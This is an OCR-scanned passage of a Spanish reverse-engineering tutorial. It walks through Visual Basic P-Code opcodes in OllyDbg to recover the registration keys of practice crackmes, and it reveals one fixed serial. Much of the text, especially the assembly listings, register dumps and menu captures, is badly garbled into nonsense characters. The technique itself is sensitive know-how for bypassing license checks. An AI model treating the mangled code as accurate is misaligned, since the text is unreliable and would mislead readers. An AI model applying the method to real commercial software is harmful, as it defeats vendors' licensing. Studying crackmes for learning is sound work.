ES E p+] $14 8] + LJEJMT|¡WHjc 


E EDI,EBP 


H EDI 
SOR EAX, EAX 
MOV AL, BYTE PTR DS:[ES1] 


Que es el puntero a un estructura donde empieza con el 3 que había guardado, y mas abajo el valor 
guardado. 


Sigamos ya llegamos jeje 


Cualquiera aquí ya que es un serial fijo probaría pasar este valor a decimal y intentar a ver si es el serial 
correcto, si abro otra instancia del crackme fuera de OLLYDBG 


= Curso sobre P-Code. Por ... E 
Introduce tu clave de registro 


Clawe: l 


Registrar 


Miro en OLLY cuanto vale ese número en decimal 


Hexadecimal 

Signed [246810 
Unsigned [246810 
Char [uo [was fuca fura. 


co 


Vale 246810 tipeemoslo en el crackme 


Curso sobre P-Code. Por ... E 


Introduce tu clave de registro 


Clave: — [246810 De 


Registrar 


P-Code [Xx] 


Número Correcto!! 


Jeje ya sabemos algo pero no se libraran tan fácil de esto, lleguemos a la comparación. 


401BF3: le Branch: 401 c94 

401BF6: Lead3/c1 LitYarlA: [local_3BE500AC ] 0x3c41a (246810) 
401BFE: local_009C 

401C02: 04 FLdRfYar local_008C 

401C05: 21 FLdPrThis 

401C06: 0f YCallAd text 

amcna: 19 FStAdFunr Incal MANAR 


El próximo OPCODE también es doble 


Es FC y enseguida lo cierra y carga el segundo 


ON LT EEN $1) 1] > 1/e[mT]wjnjc 


OR EAX, ERX 
HOd AL,BYTE PTR DS:[ES1] 
INC ESI 


| ROR EAX, EAX 


MSUBUMSD. 7413E616 


22 ERR 
MOU AL,BYTE PTR DS: [ESI] 
TN. FST 


Que es F6 entremos en el sin miedo (ya a que podemos temer jeje), recordemos que el exdec nos dice que 
trabajara con la variable local 9c o sea ebp-9c. 


EXE E SE Hu Ed a Ll elm/t/w)n]el 


P EDI 
CMP_WORD PTR DS: [EBxJ],8 


Allí lee los parámetros y los completa con FFs 


EIP 7413E619 MSUBUI 


nm PA na mos 


Por supuesto ese valor es -9c 


MOUSA EBx,WORD PTR DS: [ESI] 
ADD ESI,2 

ADD EBX,EBP 

MOU ECX, 

POP EDI 


CMP_WORD PTR boa 138 


PUSH ECX 


Lo suma a EBP para hallar EBP-9c que es 12f444 que por ahora esta vacío 


; 1 
EDI 0B12F+ 
EIP 7413E61E MS 


3... 
Sd Utpa+. 


....3t0, 


MOU ECX, a 
POP EDI 
CMP_WORD PTR DS: [EBXJ,8 


PUSH ECX 


741: 
PUSH EBX 


POP ECX 

MAY FAS. MMNRA PTR MS: FFNT1 
Luego compara si es mas bajo que 8 como es cierto salta. 
MOU EAX, DWORD PTR DS: [EDI] 


CMP AX,9 


MOV EDX, EDI 
MOU ECX, EBX 


XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI] 
_| INC ESI 

CAP Ax, 6D 


MOU DWORD PTR DS: [EBXJ,ERX 


A O 


O 


0 0 Or 


mamma mmm im ma] 


o 


Luego vuelve a saltar no entraremos en demasiado detalle, llega al final aquí donde se ven las últimas 
líneas del OPCODE. 


RD PT : [EBX],EAX 
WORD PTR DS: [EDIJ,CX 
ECX, DWORD PTR DS: [EDI+4] 
DWORD PTR DS: [EBxX+4],ECX 
ECX, DWORD PTR DS: [EDI+8] 
DWORD PTR DS: [EBX+8],ECX 
ECX, DWORD PTR DS: [EDI+C] 
DWORD_PTR DS: [EBX+C7,ECX 
EAX, ERX 
AL, BYTE PTR DS: [ESI] 
EsI 


DOS 
HN 


Snes: 


Mueve el 3 que esta en EAX a la variable EBP-9C 


Y borrara el 3 de la estructura anterior o sea que esta copiando el número, desde donde estaba a una nueva 
dirección. 


Aquí estaba y borra el 3 


Ios AD 


F44C 
F454 
EFAECITEP Fá 12 BA F2 FE 12 ar ina Y 


dE 
SOSOÍÓ 


a 
JET 
+E 

112 

At 7 


Allí lo vemos al numero que será el serial correcto en la estructura que comienza en EBP-9c 


7413E66D 


MOU DWORD PTR DS: CEBX+C1,ECX 
XOR EAX, EAX 
MOU AL. ¿BUTE PTR DS: [ESI] 


SHL EAx, 4 
ADD EBX, ERX 


15mn a 00 co: 


> 
Jul 


mMatiax EAT MARA PTR NS: TESTA 


Llegamos al siguiente OPCODE 
401C02: 04 FLdRfVar local_008C 


Vemos que repite todo lo que ya vimos hasta aquí al inicio 


401C02: 04 FLdRfVar local_008C 
401C05: 21 FLdPrThis 
401C06: 0f VCallAd text 


401C09: 19 FStAdFunc local_0088 


401C0C: 08 FLdPr local_0088 
401C0F: 0d VCallHresult get_ ipropTEXTEDIT 
401C14: 6c ILdRt local_008C 


Es todo similar al inicio, el siguiente OPCODE es 


qu ILUF: UA VLANnresun geL_ propi ex Icon! 
401C14: 6c ILdRf local _008C 


401017: Da ImpAdCallFPRA: ricR8YalFromBstr 
401C1C: Lead2/6b CYarR8 
401C20: 5d HardType 


Así que para saltear todo lo anterior pongo un BPM ON ACCESS en 401c17, para que pare cuando lea el 
OPCODE. 


MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,3 


MOUSX_EAX, WORD PTR DS: [ESI] 


PUSH_ DWORD _PTR OS: CEAX+EBP] 
00000061 MOU DWORD _PTR DS: [EAX+EBPI,0 


vb ENVY EN” 


Allí paro y lee el OPCODE OA que vemos en el EXDEC 


ImpAdCallFPR4 vemos que significa el llamado a la api que nos marca el EXDEC 


Por ejemplo 
4017FS: Oa ImpAdCallFPRA: _rtcMsgBox  <---Llamada a la función 


En este ejemplo seria un llamado a la api rrcMsgBox, en nuestro caso es un llamado a la api 


401C17: Oa ImpAdCallFPRA4: _ricR8ValFromBstr 


E APENAS SAAESASEAAAA Y Y yoOY A 
OFB7OE MOUZA_ECX, WORD PTR DS: [ESI] 

AC MOV EDxX, DWORD PTR SS: [EBP-54] 
MOU_EAX, DWORD PTR DS: CEDX+EC%%*4] 
OR EAX. ERX 


ARAMIPCO7?| A EE 1 ?0 CE 1 09 Aal+ am . A 


EIP 7413E7A9 MSUBL 


CO ES 0023 32bit 


Los mueve a ECX 


Ex a M4] $0] Y] + L]E/MT/WH|C]//E]B]R]+J5] :=3)?| 


MOU EDX, DWORD PTR SS: LEBP- 54] 
mos EAX, DWORD PTR DS: [EDX+ECX*4] 


clavel.00401000 


MOUZX EDI,WORD PTR DS: [ESI+2] 
San Pera 


Luego mueve a EAX el valor 401000 y lo testea si es cero 


OFB77E B2 MOUZZ EDI, WORD PTR DS: [ESI+2] 
8306 14 ADD ESI,4 

O3FC ADD EDI, ESP 

FFDO 

3BFC CMP EDI,ESP 

AFSE SR79AARA | IN OMAURUMRAITA VA RIOR 


78 FF 1C 93 BO|t +x Lo. 


B04b61006 <. 
ECX BOBBBBaZ 
EDx BO04B17E4 e 
EBX FFFFFFFF 
ESP BB12F3C0 
EBP B012F4E0 
c 


OSLO U4+ HUD EDI, + 


B3FC ADD EDI,ESP 
CMP EDI,ESP 


vn ENVY ENY 


3BFC 
BFSS 5B790000 
22P1A 


Y llega al call eax donde EAX vale 401000, veamos donde va, va a la api susodicha. 


EXE 0 3 48] 4 Jem 198] 0) Jx]8/r].s] 


PUSH _clavel.D0401258 
Ann RYTF PTR MS: fFAX1.A 


E 
5 


BB15039C UNICODE "98989898" 
151s/515]5151515] 
15151515]5]51515] 
Js/s15115]515] 
15ls/s1el5151515) 


Mi serial falso 


| MSUBUMSA. rtoMsgBox 
MSUBUMSO.  vbaExceptHand ler 
MSUBUMSO. EVENT. IAE IDERES 
MSUBUMSO. EVENTZSINK_AddRef 
MSUBUNMSO. EVENT_ZSINK_Re lease 
MSUBUMSO. MethCal lEngine 
MSUBUNSA. ThunRTMain 


(T5TsTsT=T215] 
ECX BO159710 


[2] 
EBX FFFFFFFF 
ESP BO12F3C4 
EBP B012F4E0 
ESI BO04B1C1C clavel.6B4B1C1C 
EDI B012F3C4 


EIP 7413E7C2 MSUBUMSO. 7413E7C2 


OB ES 0623 32bit B(FFFFFFFF) 
1 CS 00618 S2bit B(FFFFFFFF) 
BM SS 0023 32bit B(FFFFFFFF) 
1 DS 0023 32bit BLFFFFFFFF) 
5 FS 663B 32bit TFFDFOBB(FFF) 
12] 
a 
L 


GS 6008 NULL 


LastErr ERROR_SUCCESS ( 


1000090246 (NO,NB,E,BE,NS,P 


empty + 1515151515135] 
empty 0. 0000007346661 499Be-4933 
empty 0.D656640730442726420e-4933 
empty 6.5358173580319098120e-3137 
empty 6.141147624774262974Be-2865 
empty +UNORM 7CBO 00037C9B BOSFFFCO 
empty -8.B a Ela ie 
E 15) SEE 


2 I 
3908 Cond00061 Er06080600008 (LT) 
137F Prec NEAR,64 Mask IISTAL 


El cual fue cargado en St0 que es una entrada del stack de punto flotante que aun no hemos explicado, 
pero bueno, allí lo ven esta debajo de los registros, si no le sale visible, pues tienen la vista en otra opción 


hagan click derecho 


Zero 

Modify Enter 
Copy selection to clipboard Creo 
Copy all registers to clipboard 


View FPU reg 
Wiew 3DNow! registers 
View debug registers 


Appearance 


Allí esta el tipo cargo mi serial falso allí. 


CMP EDI,ESP 


mou AL, BYTE PTR DS: [ESI] 

INC ESI 

MOUVZX_ECX, WORD_PTR DS: [ESI] 

MOU EDX, DWORD PTR SS: [EBP-54] 
MU FAX. MARA PTR NS: PFNX+FOXed1 


1000 TACO 


Llego al siguiente OPCODE 
401C1C: Lead2/6b CVarR8 
Pues allí estamos entremos en el opcode 


MA A HJ] 4 24 7  M 
ZOR EAX, EAX 


MOU AL,BYTE PTR DS: [ESI] 


Como es un opcode doble borra el primero y carga el segundo 


A A Y Y HAY Y AS Y —= — Y Y AY Y A A Y Y Y SY 


e ESE 


MOU_EDX,5 
ROSIBA EAS, WORD PTR DS: [ESIJ 
ADD El %, EBP 

FSTP BUORD PTR_ DS: [EAX+8] 
MOU WOR > PTR DS: [EAXI, DX 


TEST AL, 6D 


ii 


PATA AA rar” 


Bueno allí hay unos comandos de punto flotante que aun no hemos visto 


Pero vemos que al inicio esta cargando parámetros 


MOU EDx,S 
cta EAX, WORD PTR DS: [ESI] 
FSTP QUÓRD _PTR_DS:[EAX+8] 


MOU WORD PTR DS: [EAXI,DX 
PUSH FOY 


ECx 6B159710 
JEDx BOBaBaBS 
| EBX FFFFFFFF 
ESP BB12F3C4 
EBP 6012F4E0 
ESI 06401C1E cl: 
EDI 0612F3C4 


EIP 7413D380E MS 


MIUVIA EHAs WURO FIN UDI3LEDIJ 


ADD _EAX,EBP 


DD FSTP QUORD _PTR DS: [EAX+8] 
E: MOU WORD PTR DS: CEAX],DX 
SE PUSH EAX 

D FSTSW AX 

Al TEST AL,9D 

AF: ¿IN? MSURUMSA. 74140104 


Con FSTP guardara el primer valor del stack de punto flotante STO, a la dirección de memoria en este 
caso [EAX+8] o sea 12f43c y hará POP el stack de punto flotante bueno eso ya lo explicaremos mas 
adelante. 


no. CI0U4A 


FS 12 AARLU 


Ya se que ustedes pueden tener alguna duda que ese es nuestro serial falso, lo que pasa es que esta 
transformado a 64 bit doble, veamos si hago click derecho 


Short » 
Long 


32-bit float 


Disassemble 
Special 


s0-bit long double 


Appearance  » 


LES. ñU 0. 
últ. Ent. 


43219693/523/4bBe-323 


6267240666019382-2308 
-7430079426988250-318 
.792485495817880e-307 


.63619/811031977e-308 
.42383/248936B62e+251 


-1389627336/3929e-305 
.636248745657113e-308 
6362497011042180e-308 
192145974831099e-307 
21683/333634428e-309 


639075238026684e-308 
636231/63578288e-308 


E 1 
E 9 
E 2 
E 2 
E 1 
E 1 
t 5 
tE 2 
r 2 
b ? 


2 
1 A 
1 E 
o E 
1 a 
2 ¡A 


¿AAR2A91 2341 2492P-2AR A7ER7TAA?A14PAR?FP=217 


Veo que efectivamente es mi serial falso, solo que cambio de forma de representación al abarcar 8 bytes o 
sea doble de 64- bit, lógico de 4 bytes es 32 —bit, ahora es doble o sea un numero de 64-bit, por eso se ve 
diferente. 


1 LU; LELAL Jo rn 
A $ 


Text 
Short 
Long 

Float 
Disassemble 

Special 


E 


l 
' Appearance  » 
| has 
: 03 15 0 A4 BC CF 00 £escñiñ. 
¿ F4 12 00 CS FS 12 00408. 05+. 


Volvamos a la visión normal 


(A4LSUGLA DU FUSH EH 


4130517] AS 6D TEST AL,BD 


7413D819|+ BF85 s7coouga | UNZ MSUBUMSO7414A1A6 


Eso guarda el STATUS WORD de punto flotante a AX, ejecutemos 


clavel. b6B401C1E 


MSUBUNMSO. 74130817 


32bit O(FFFFFFFE) 
32bit O(FFFFFFFEF) 
32bit B(FFFFFFFF) 
32bit B(FFFFFFFEF) 
32bit ?FFDFOBB(FFF) 
NULL 


ERROR_SUCCESS (00000008) 
(NO,B,NE,BE,NS,PO, GE, G) 


+UNORM 7364 5B004111F 60004B6O 
9. 000000007346661499Me-4933 
0. 0656640730442726420e-4933 
6.5358173580319098120e-3137 
6.1411476247742629740e-2865 
a YCBO BBB37CIO BOSFFFCO 


SPD ESO E 
Cond00061 Eró6006585b5006 (LT) 
Prec NEAR,64 Mask INIA 


74130819] BFS5 37090000 


Y4130321| —5A46 62 MOU AL,BYTE PTR DS: [ESI+2] 
y413D824| 3306 M3 ADD ESI,S 

7413D3827| FF2485 

Y413082E| 28B0424 MOU EAX, DWORD_PTR SS: [ESP] 
r4130831| £6:s108 60680 [OR WORD PTR DS: [EAXJ,8000 

7413D0336| 3300 XOR EAX, EAX 

74130838|  SAD6 MOU AL,BYTE PTR DS: [ESI] 

Y413083A| 46 INC ESI 


Allí termina el OPCODE 
401C20: 5d HardType 


Bueno este no tengo la más mínima idea de lo que es pero lo descubriremos 


74130827]  FF2485 
7413D831 66: 5168 ousa [OR WORD PTR DS:[EAX],S090 


74130836 XOR EAX, EAX 
74130838| —S3A06 MOU AL,BYTE PTR DS: [ESI] 
7413083A INC ESI 


46 
7413083B FF2485 
2412042 AFRFSF MMUSZ FOT.MARA PTR MS: PFSTI 


Bueno son solo dos líneas mueve el contenido de ESP a EAX 


EIP 74130831 MS 


MNNRDDO 
Y a po € 


¿+ CIGÚA 


e. 4 


Vemos que esta agregando al número que esta arriba de mi serial falso transformado, posiblemente ese 
número indique el formato en que se encuentra, y ahora lo ajusta. 


90 60 44 23 00 99 
03 60 00 60 06 BO 00 Ba + 


CLAM FA 14D (aa (aa (ara (ara (ara 


Siguiente OPCODE 


401C21: 04 FLdRfVar local_009C 


Ese es el inicial o sea PUSH ebp-9c en este caso 


DILE AAC] Tr 1 UN TO TEA AO UI] Me 7 


Command ? ebp- 9c y| HEX: 12F444 - 


Allí esta 


El siguiente es un opcode doble 


401C24: Lead0/40 NeVarBool 


MA A 29 FE Y] 2 MU 


FOR EAX, EAX 
MOU AL,BVYTE PTR DS:[ESI] 
INC ESI 


"| ROR EAX,EAX 


Mn mm DUTE DTD MC. FTECTA 


Allí lee el segundo opcode 


CEET mm EEE HE al +] 1/ejmr/wn[c). 


hoy" ERx MSUBUMSO. 7413ED74 
PUSH_DWORD PTR DS: [EBX+EA%%*4] 
vo EnNVY EN” 


Llega a ese call y los parámetros en el stack son 


ses hdi 


a o Ad aid " 


«| US AU 


PUSH_B 
MOU EBX, MSUBUMSO. 7413ED74 


PUSH_DWORD PTR DS: CEBX+ERX4] 
20R EAX, ERX 
MOU AL, ¿BYTE PTR DS: [ESI] 


E 74ED1374 
ES. OS 


Pongamos un BP alli 


; BBL2F444 
1413ED74 MS! 
SP OuiZF3Cs 

4 4E5 


' 7413EC06 MS 
ES B 


Y que hace un PUSH al stack con el valor FFFFFFFE, es casi seguro que la comparación es aquí, así que 
reinicio el crackme total puse un BP, y pongo el serial correcto que obtuve de esta comparación 


Address | Hex dump________JascIr_| 


03c41a pasado a decimal es 246810, pongámoslo y lleguemos a la comparación de nuevo 


= Curso sobre P-Code. Por ... 


Introduce tu clave de registro 


Clave: [24681 d 


Registrar 


Al parar veo que compara 


64-bit_ double 

De 34| 1.619201341115517e-319 

1.482196937523740e-323 .2194 e-318 
9.038962733674010e-395  2.636724066601938e-308 
2.636248745657113e-308  1.743007242698825e-310 
cda da AA a nm a 


246810 con el valor hexa del mismo, la verdad que son diferentes formatos pero como arriba de cada uno 
hay un numero que identifica el formato es posible que dentro del mismo call los transforme y los 
compare, veamos que nos da ahora a la salida 


- BOGaUadO 
X BOBBDDOS 
ED BB12F944 


JD 


Y el push al stack también da cero 


Lo cual quiere decir que esta es la comparación, además vemos justo abajo unos Branch, que son los 
saltos que decidirán si ir al cartel correcto o incorrecto, luego de liberar las strings y valores usados 


401C21: 04 FLdRfYar local_009C 


401C26: 2f FFreel Str local_008C 
401029: la FFreelAd local 0088 
401C2F: 27 LitYar_Missing 
401032: 27 LitYar_Missing 


Ustedes dirán esto es mucho trabajo, pero si se dan cuenta el trabajo fuerte, es la primera vez que usas 
cada opcode pues una vez que descubrís que hace ya no necesitas repetirlo, por lo demás el WKT 
debugger te muestra el nombre de los OPCODES, pero no sabes que hace cada uno, salvo los mas 
conocidos y con OLLYDBG , podemos determinar que hace cada uno y tener una mejor idea de cómo 
funciona el programa. 


En la próxima parte haré con el mismo método el crackme adjunto clave 2, me gustaría que siguiendo el 
mismo método hallaran la clave si pueden de ese clave2, si no, en la próxima parte lo haré yo, y lo podrán 
leer. 


UFFFFFFFF 
Hasta la 30 
Ricardo Narvaja 


INTRODUCCION AL CRACKING CON OLLYDBG parte 30 


Bueno después de haber practicado y si aun están vivos seguiremos con PCODE. 


Tenemos algunos OPCODES más que juntamos por ahí de los tutes de JBDUC 


6c -> ILdRf Empuja una dirección a la pila 

1b -> LitStr5 Empuja una cadena literal a la pila 

fb -> Lead0 Compara dos cadenas (jeje, para que podría servir esto :-) 

30 -> EqStr Compara dos cadenas (jeje, para que podría servir esto :-) 

2f -> FFree1Str Libera la memoria usada 

la -> FFree1Ad Libera la memoria usada 

0f -> VCallAd Ejecuta código dentro de la máquina virtual 

1c -> BranchF Salta si la comparación previa era falsa ( vamos lo mismo que un jne/jnz de 
asm ) 

1d -> BranchT Salta si la comparación previa era cierta ( vamos lo mismo que un je/jz de 
asm ) 

1e -> Branch Salta incondicionalmente ( jeje adivina ke utilidad tiene) 

fc -> Lead1 Termina la ejecución del programa (jeje este es bueno...) 

c8 -> End Termina la ejecución del programa (jeje este es bueno...) 

13 -> LitI2 Guarda el Integer especificado en la pila 

f4 -> LitI2_Byte Convierte un valor de Byte a Integer y lo mete en la pila 

70 -> FStl2 Guarda el último Integer que se haya en la pila en la variable global 
especificada 

6b -> FLdl2 Carga en la pila un Integer desde la variable local especificada 

a9 -> AddlI2 Suma los dos últimos Integers que se empujaron a la pila y mete en pila el 
resultado 

ad -> Subl2 Resta los dos últimos Integers que se empujaron a la pila y mete en pila el 
resultado 

b1 -> Mull2 Multiplica los dos últimos Integers que se empujaron a la pila y mete en pila el 
resultado como un Integer, creo que si hay desbordamiento se ignora. 


Bueno tenemos unos cuantos opcodes mas, que nos evitaran tener que investigarlos, además adjunto un 


archivo 


llamado P-CODE OPCODES que supuestamente distribuye Microsoft que ayuda un poco y que 


lista los opcodes y que hace cada uno (no todos jeeje), en una muy escueta descripción (jeje demasiado 


escueta 


para mi gusto, pero bueno, antes de entrar a un opcode conviene mirar a ver si en el mismo 


podemos comprender que hace, así entramos con cierta idea. 
Como les prometí, al inicio haremos el crackme clave 2 que quedo de ejercicio la vez anterior, miremos si 
podemos hallar un listado con el EXDEC. 


== C:iDocuments and Settings|RicardolEscritorio!l 
File Edit Toolbar View Find Text 


4 [ea] o] 


Email josephco_Ghotmail.com with any errors or problemsa0dThis program doesn't have executable code right a 


Proc: 401e90 


401CC3 
401CCA 
A01CC7 
A01CCA: 


: 21 FLdPrThis 

: Of VCallAd text 

: 19 FStádFunc local_0088 
: 08 FLdPr local_0088 


401CCD: 0d YCallHresult get_ipropTEXTEDIT 


401CD2 
401CD5 
401CD8 


: 6c ILdAf local_008C 
:1b LitStr 2 
: Lead0/30 EqStr 


"| 401CDA: 2f FFreelStr local_008C 
401CDD: la FFreelAd local_0088 


401CE0 
401CE3 
A01CE6 
401CE9 
A01CEA: 


: 1c BranchF: 401CE6 

: Te Branch: 401e8c 

: 04 FLdRfVar local_008C 
: 21 FLdPrThis 

: Of VCallAd text 


401CED: 19 FStádFunc local_0088 


401CFO: 
A401CF3: 


Aniocra: 


08 FLdPr local_0088 
0d YCallHresult get__ipropTEXTEDIT 


Eo 1 ADE lacal ANACO 


Ahí tenemos y vemos que comienza en 401cc0, para los que no creen en el EXDEC ya que muchas veces 
puede ser engañado, veamos si hallamos el primer OPCODE a mano, como vimos en la parte anterior. 


- [CPU - main thread, module clave2] 


[€] File View Debug Plugins Options Window Help 


CEDE ea] vie] sit) 0] + Ljejmjtriwu]c//]k/8]r]-Js] 


PUSH c 2. 00481258 
DS: [EAXI, AL 


63 58124000 
ES EEFFFFFF 
6006 


: CEAXJ, AL 


ECX,EDX 
DWORD_PTR_DS: LEBX],EAX 
BYTE PTR DS: CEDI-281,CL 

DC DWORD_PTR_DS: CEAX+EDÉ+4AFASSE71, EBX| . 


MSUSUMSO. rtoMsgBox 
MSUBUMSO. rtoLowerlaseVar 
MSUBUMSO. rtoTrimUar 
MSUBUMSO. rtoMidCharVar 
MSUBUMSO. rtcAnsiValueBstr 


MSUBUMSO.  vbaExceptHandler 
MSUBUMSO. EVENT_SINK_Query Interface 
MSUBUMSO. EVENT_SINK_AddRef 
MSUBUMSO. EVENTZSINK_Re lease 
MSUBUMSO. MethCal lEngin 

MSUBUMSO. ThunRTMain 

ADD BYTE PTR DS: [EAXJ],AL 
PUSH clave2. B0401258 


A E A ar 


6s 58124000 
ES EEFFFFFF 
0000 


anar 


Allí esta, por si acaso sea llamada directamente sin usar el JMP; nos posicionamos sobre el y hacemos 
FOLLOW para ir a la api y ponemos un BP allí también. 


[c] File View Debug Plugins Options Window Help 


SUB Dl TR SS: [ESP+4], 
MOU ECX, MSUBUMSO. 7413E302 
PUSH_EBP 

MOU EBP,ESP 


8BEC 

FF7424 08 PUSH DWORD PTR SS: [ESP+8] 
FF7S aC PUSH DWORD PTR_SS: [EBP+C] 
ES CAFÍFFFF 


PUSH_O 
8D55 14 LEA EDxX, DWORD PTR SS: [EBP+14] 


B9 M2E31374 
a 39A2FFFF 


Listo ahora demos RUN hasta que pare en alguno de estos BP que colocamos. 


= Curso sobre P-Code. Por ... 


Usuario: l IS 
Serie Núm.: 


Registrar 


Aparece la ventana antes de parar en el BP, el tema que la ventana aparece antes que entrar a PCODE, 
debo aclarar que no necesariamente es así, puede parar en el BP y luego aparecer la ventana, en este caso, 
aparece la ventana antes, coloco un nombre y serial falso. 


Y al apretar REGISTRAR para en el BP del JMP ahora voy a la primera sección (recordar no usar el 
OLLY parcheado para OEPs y Visual si no, no funcionara) y le coloco un BPM ON ACCESS en la 
sección code. 


00400000| 606001958] clave2 PE header | Imag|R RE | 
p0401000 B00B1A0A clave2 | .tent code 

00402000 00001000 clave2 |.data [data  Arctualize 

00403000| 00001000| clave2 |. idata | impo 


500404000 | 00061000! clave2 ¿Psrc reso á D P 

dosasana Boga1009 clave2 |:reloo [rela View in Disassembler Enter 
60400000 | 60002000 Durnp in CPU 

004E0000| 00103000 

DOSFOB0A| BOBCSADO Dump 

00SFO000| 00B10000 

D0CFOB00| BOBBDADA Search CtrH+B 


Ss | 
eODAGO0O| 66001000 | Set break-on-access F2 
5B150000| 00001000| uxtheme - 
5B151000| 600030000| uxtheme | .text 
58131000| 00001000| uxtheme | .data 
5B182000| 00004000 | uxthenme | .rsro 
sB186000| 00p02000| uxthene_| «re loo 


Uma ma 


33to — 
2AB6 


46 

FF2485 24EDI SO 
66:F743 6C 1001 
BFS5 59620000 
66:F743 6C 2001 
75 1D 


BBCO OR EAXx, ERX 
sa E MOU_EAX, BEDGB 


8945 BS MOU DWORD PTR SS: [EBP-48],EAX 
8B45 3 MOU EAX, DWORD PTR SS: [EBP+8] 
E PUSH LEAR 


Allí esta, recordemos que siempre ESI debe apuntar al opcode y mover el mismo a AL. 
Como vemos el EXDEC no se equivoco y el primer OPCODE esta en 401cc0 y es el 04. 


Proc: 401e90 
401CC0: 04 FLdRiVar local_008C 


Recordamos que el 04 era un simple PUSH del argumento que en este caso es EBP-8C si miramos la 
ayuda que adjuntamos sobre el OPCODE. 


04 567B0B8E212 Push arg 


VM VBA 
Op Code RVA RVA argsizes 
1A 65CE 1E12 2 1 2 
1B 5CEF 13A8 2 1 2 
1C 51C4 04D5 2 1 2 
1D S1AF 04C0 2 1 2 


total arg size o 


arg count 


aregl, 2, and 3 size (bytes) 


Allí mismo nos aclara que es cada cifra en nuestro caso el 0B8E seria el RVA del opcode, 2 seria la 
cantidad de bytes que tienen los argumentos en total, 1 nos aclara que tiene un solo argumento, y el 
ultimo 2 seria el largo en bytes de cada argumento por separado. 

Bueno es un PUSH EBP-8C sigamos mirando el listado sin necesidad de tracear uno a uno, vemos estos. 


401D4C: 0d VCallHresult get_ipropTEXTEDIT 


401DFB: 0d VCallHresult get_ ¡ipropTEXTEDIT 


Vemos que hay dos calls para leer lo que ingreso en la ventana de registro, posiblemente el primero lea el 
nombre y el segundo el serial falso que tipeo, pongamos un BPM ON ACCESS en el primero o sea en 
401d4C. 


OS : 2 091 
a eco E a 
dl e 
98491D7C| Es Binary P 081 
dose Dec |eé Label on 
99401D94| FE y 501 
00 EEE E a 
oss91DAc[ed Search for >| Memory, on write 081 
ARANA FA SN] rc mtm n 1 1 .a e 


Allí esta el opcode y le coloco el BPM y doy RUN. 


4d x] e ju] visi $0] 1] > ujejmitiwjnjc 


MOU AL,BYTE PTR DS: [ESI] 
46 INC ESI 


FF2485 24ED137/ 
8870 B MOU_EDI,DWORD_PTR SS: LEBP-40] 
MOUZX _EAX, WORD PTR DS: [ES1] 
ADD ESI,2 

MOV EAX. DWORD PTR DS: CEAX+EDI] 


el siguiente opcode, a ver si ingresa el nombre. 


MOU EAX, DWORD PTR SS: CEBP-40] 
PUSH EAX 

MOUZX EDI,WORD PTR DS:[ESIJ 
MOÚU EAX, DWORD PTR DS: CEAX] 
ADD Es EDI 

MOU EDX, DWORD PTR SS: CEBP-44] 
TEST WORD PTR DS: LEDX+761,2 
OR EA EAX AS 
XOR EAX, EAX 

MOU AL,BYTE PTR DS: [ESI+4] 
ADD ESI,5 


mou MSUBUNSO 


CMP AX, 9C68 


Allí llega al siguiente opcode miremos el stack a ver si lo guardo 


401D4C: 0d VCallHresult get_ipropTEXTEDIT 
401D51: 3e FLdZeroAd local_008C 


Como vemos que a continuación trabaja con la variable local 8c que equivale a EBP-8C me fijo si lo 
guardo allí, en mi maquina ebp-8c vale 121454 


Command ? ebp-8c y HEX: 12F454- 


Busco en el stack esa dirección a ver si esta allí mi nombre. 


(51515T:]]:15]3] 
15151515]5]5]51=) 
Bu15CA94 
BABCFBE1C 
Bu12F4EC 
ou12FS5CS 
BOCFBBSC 
B012F4ES 


UNICODE "narvaja” 


Pues si, allí lo veo, así que vamos bien, aquí veo que ingreso mi nombre, lo lógico seria que en el otro, 
ingrese mi serial falso, pongamos un BPM ON ACCESS en el segundo. 


401DFB: 0d VCallHresult get_ ipropTEXTEDIT 


4 
b Copy > 
E OS Binary » 
E 0% Label : 
. 48 E Memory, on access 
a Search for » Memory, on write 


SB|FE 
53/09) 


TR DS: [ESI] 


MOU AL,BYTE 

INC ESI 

MOU_ EDI, DWORD P : [EBP-4C] 
MOUZX_EAX, WORD DS: [ESI] 


ADD ESI,2 
mou RN PTR_DS: [EAX+ED1] 


MOUSX EDI,WORD PTR DS: [ESIJ 
MOUZX EAX, WORD PTR DS: [ESI+2] 
ADD ESI,4 
MOU_EDX, DWORD PTR DS: CEDI+EBP] 
OR EDx,EDx 


Añ4A1F1RI24 FF Ad FFi1f. 99 A1 2714 T ¿ññA” 


Como antes traceemos hasta el siguiente opcode. 


OR EAX, EAX 


| MOU EAX,9c68 


CnaP SUbÚNeO 

PUSH EDI 

MOUZX EBX,WORD_PTR DS: [ESI+2] 
MOU EDxX,DWORD_PTR SS: [EBP-54] 


MAA MAA MATA MA POT Pa AA 


Y veamos si guardo el serial falso en la variable local que usara 


401DFB: 0d VCallHresult get_ ipropTEXTEDIT 
401E00: 3e FLdZeroAd local_008C 


Como antes lo guardara en EBP-8c 


AAR1SFdES FFEFEFFF 


Bueno ya llegamos a donde ingresa nuestro serial falso, vemos como conociendo los opcodes no es 
necesario tracear todo el programa podemos ir poniendo BPM y llegando a las partes calientes sin 
necesidad de tracear todo, en la parte anterior traceamos todo para que entiendan el mecanismo de cómo 
funciona PCODE pero normalmente no necesitamos hacer eso, ya lo veremos en la próxima parte cuando 
crackeemos un extenso programa y localicemos solo la zona caliente que nos interesa y miremos por allí. 


401E0F: Lead0/ef ConcatVar 
401E13: Lead0/40 NeVarBool 


401E15: 1a FFree1Ad local_0088 
401E18: 36 FFreeVar local_00CC local_00AC 
401E1F: 1c BranchrF: 401E59 


Luego viene esto que tiene todo el aspecto de comparación, luego liberación de la variables locales con 
FREE, y salto condicional que como vemos va a 401e59 que es el rtcMsgBox de clave correcta y si no 
salta va al cartel de Clave no Valida 


: la FFreelAd local_0088 
401E18: 36 FFreeVar local_00CC local_00AC 
A401E1F: 1c BranchF: 401E5 


401E22: 27 LitVar_Missing 
401€25: 27 LitVar_Missing 
401E28: 3a LitVarStr: (local_00B4 )] P-Code 
401E2D: 4e FStVarCopyObj local_04CC 
401E30: 04 FLdRfYar 
401E33: f5 Litl4: 0x10 16 (....) 

401E38: 3a LitVarStr: (local_009£ ] Clave No Válida! 
401E3D: 4e FStVarCopyObj DAC 

401E40: 04 FLdRfVar El 
40143: Da ImpAdCallFPRA: cal sgBox 

40148: 36 FFreeYar local_00AQ local_00CC local_00EC local_010C 
401E53: 1e Branch: 
401E56: 1e Branch: 
401E59: 27 LitVar_Missing 
: 27 LitYVar_Missinc 
: 3a LitVarStr: [local_00BC ] P-Code 

: 4e FStYarCopyObj local_00CC 

